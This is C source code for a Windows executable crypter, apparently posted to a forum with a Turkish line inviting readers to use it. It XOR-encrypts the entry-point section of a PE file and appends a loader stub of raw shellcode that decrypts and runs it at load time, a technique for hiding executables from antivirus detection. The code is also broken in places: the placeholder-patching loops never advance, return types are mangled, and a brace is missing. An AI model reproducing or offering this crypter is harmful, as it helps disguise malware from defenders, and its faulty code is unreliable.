#define CRYPT
#include <stdio.h>
#include <windows.h>
typedef struct _PEFILE
{
IMAGE_DOS_HEADER *idh;
IMAGE_NT_HEADERS *inh;
char *data;
int sz;
}
PEFILE;
#define EntryPoint(pefile) pefile.inh->OptionalHeader.AddressOfEntryPoint
#define Align(sz, alignment) (((sz) % (alignment)) ? ((sz) + (alignment) - ((sz) % (alignment))) : (sz))
char code[] =
#ifdef CRYPT
"\x9C" /* PUSHFD */
"\x60" /* PUSHAD */
"\xB9\xFF\xFF\xFF\xFF" /* MOV ecx, SectionStart */
"\x81\xC1\xBB\xBB\xBB\xBB" /* ADD ecx, ImageBase */
"\x89\xCA" /* MOV edx, ecx */
"\x81\xC1\xEE\xEE\xEE\xEE" /* ADD ecx, SectionSize */
"\x80\x31\xDD" /* XOR BYTE PTR ds:[ecx], XOR_KEY */
"\x49" /* DEC ECX */
"\x39\xD1" /* CMP ecx, edx */
"\x7D\xF8" /* JGE SHORT _XOR_ */
"\x61" /* POPAD */
"\x9D" /* POPFD */
#endif
"\xBA\xCC\xCC\xCC\xCC" /* MOV edx, EntryPoint */
"\x81\xC2\xBB\xBB\xBB\xBB" /* ADD edx, ImageBase */
"\x52" /* PUSH edx */
"\xC3" /* RETN */
;
#define SZ_NEW_SECTION (sizeof(code) - 1)
**** putError(char* text, char* text2)
{
printf("%s\r\n%s\r\n",text,text2);
exit(0);
}
**** load_file(char *file, PEFILE *pefile);
**** unload_file(PEFILE *pefile);
int calculateSizeOfImage(PEFILE *pefile);
**** code_replace_dword(char *, int, int, int);
**** code_replace_byte(char *, int, char, char);
**** write_file(const char *, PEFILE *, char *, int);
int XOR_KEY;
int main()
{
PEFILE pefile;
IMAGE_SECTION_HEADER *ish;
IMAGE_SECTION_HEADER *Encrypted;
IMAGE_SECTION_HEADER nsec;
int offset, i, j, oep;
XOR_KEY=1;
load_file("useragent.exe", &pefile);
offset = pefile.idh->e_lfanew + sizeof(IMAGE_NT_HEADERS);
for(i = 0; i < pefile.inh->FileHeader.NumberOfSections; i++)
{
nsec = *(ish = (IMAGE_SECTION_HEADER *) &pefile.data[offset]);
offset += sizeof(IMAGE_SECTION_HEADER);
if (EntryPoint(pefile) >= ish->VirtualAddress &&
EntryPoint(pefile) < (ish->VirtualAddress + ish->Misc.VirtualSize))
{
Encrypted = ish;
#ifdef CRYPT
for (j = 0; j < ish->Misc.VirtualSize; j++)
{
pefile.data[ish->PointerToRawData + j] ^= XOR_KEY;
}
#endif
strncpy((char *) &ish->Name, ".crypted", 8);
ish->Characteristics |= IMAGE_SCN_MEM_WRITE;
}
}
for(i = 0; i < sizeof(IMAGE_SECTION_HEADER); i++)
{
if (pefile.data[offset + i])
{
putError("kein freier Platz fuer den SectionHeader vorhanden", "");
}
}
strncpy((char *) &nsec.Name, ".loader", 8);
nsec.VirtualAddress += Align(nsec.Misc.VirtualSize, pefile.inh->OptionalHeader.SectionAlignment);
nsec.Misc.VirtualSize = SZ_NEW_SECTION;
nsec.SizeOfRawData = Align(SZ_NEW_SECTION, pefile.inh->OptionalHeader.FileAlignment);
nsec.PointerToRawData = Align(pefile.sz, pefile.inh->OptionalHeader.FileAlignment);
nsec.Characteristics = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ;
memcpy(&pefile.data[offset], &nsec, sizeof(IMAGE_SECTION_HEADER));
oep = EntryPoint(pefile);
pefile.inh->OptionalHeader.AddressOfEntryPoint = nsec.VirtualAddress;
pefile.inh->FileHeader.NumberOfSections++;
pefile.inh->OptionalHeader.SizeOfImage = calculateSizeOfImage(&pefile);
pefile.inh->OptionalHeader.BaseOfCode = nsec.VirtualAddress;
pefile.inh->OptionalHeader.CheckSum = 0;
code_replace_dword(code, SZ_NEW_SECTION, 0xFFFFFFFF, Encrypted->VirtualAddress);
code_replace_dword(code, SZ_NEW_SECTION, 0xEEEEEEEE, Encrypted->Misc.VirtualSize);
code_replace_dword(code, SZ_NEW_SECTION, 0xCCCCCCCC, oep);
code_replace_dword(code, SZ_NEW_SECTION, 0xBBBBBBBB, pefile.inh->OptionalHeader.ImageBase);
code_replace_byte(code, SZ_NEW_SECTION, 0xDD, XOR_KEY);
write_file("crypted.exe", &pefile, code, SZ_NEW_SECTION);
unload_file(&pefile);
}
**** write_file(char *file, PEFILE *pefile, char *c, int sz)
{
FILE *fp;
int i;
if (!(fp = fopen(file, "wb")))
putError("konnte die Datei <%s> nicht schreiben", file);
fwrite(pefile->data, 1, pefile->sz, fp);
while(ftell(fp) != Align(pefile->sz, pefile->inh->OptionalHeader.FileAlignment))
{
fputc(0, fp);
}
fwrite(c, 1, sz, fp);
for(i = 0; i < (Align(pefile->sz, pefile->inh->OptionalHeader.FileAlignment) - sz); i++)
{
fputc(0, fp);
}
fclose(fp);
}
**** code_replace_dword(char *code, int sz, int pattern, int replacement)
{
int i;
for(i = 0; i < sz; i++)
{
if (*((int *) &code) == pattern)
{
*((int *) &code) = replacement;
}
}
}
**** code_replace_byte(char *code, int sz, char pattern, char replacement)
{
int i;
for(i = 0; i < sz; i++)
{
if (*((char *) &code) == pattern)
{
*((char *) &code) = replacement;
}
}
}
int calculateSizeOfImage(PEFILE *pefile)
{
IMAGE_SECTION_HEADER *ish;
int offset;
int i;
int vAddress;
int SizeOfImage;
offset = pefile->idh->e_lfanew + sizeof(IMAGE_NT_HEADERS);
vAddress = 0;
for(i = 0; i < pefile->inh->FileHeader.NumberOfSections; i++)
{
ish = (IMAGE_SECTION_HEADER *) &pefile->data[offset];
offset += sizeof(IMAGE_SECTION_HEADER);
if (vAddress < ish->VirtualAddress)
{
vAddress = ish->VirtualAddress;
SizeOfImage = ish->VirtualAddress + Align(ish->SizeOfRawData, pefile->inh->OptionalHeader.SectionAlignment);
}
}
return SizeOfImage;
}
**** load_file(char *file, PEFILE *pefile)
{
FILE *fp;
if (!(fp = fopen(file, "rb")))
putError("konnte die Datei <%s> nicht oeffnen", file);
fseek(fp, 0, SEEK_END);
pefile->sz = ftell(fp);
fseek(fp, 0, SEEK_SET);
if (!(pefile->data = (char *) malloc(pefile->sz + 1)))
putError("die Datei passt nicht in den Speicher", "");
fread(pefile->data, 1, pefile->sz, fp);
fclose(fp);
/* TODO: PE Header checken... */
pefile->idh = (IMAGE_DOS_HEADER *) pefile->data;
if(pefile->idh->e_magic != IMAGE_DOS_SIGNATURE)
putError("dos","");
pefile->inh = (IMAGE_NT_HEADERS *) &pefile->data[pefile->idh->e_lfanew];
if(pefile->inh->Signature != IMAGE_NT_SIGNATURE)
putError("nt","");
}
**** unload_file(PEFILE *pefile)
{
if (pefile->data)
{
free(pefile->data);
pefile->idh = 0;
pefile->inh = 0;
pefile->sz = 0;
}
arşivde böyle bi kaynak var istersen kullanabilirsin
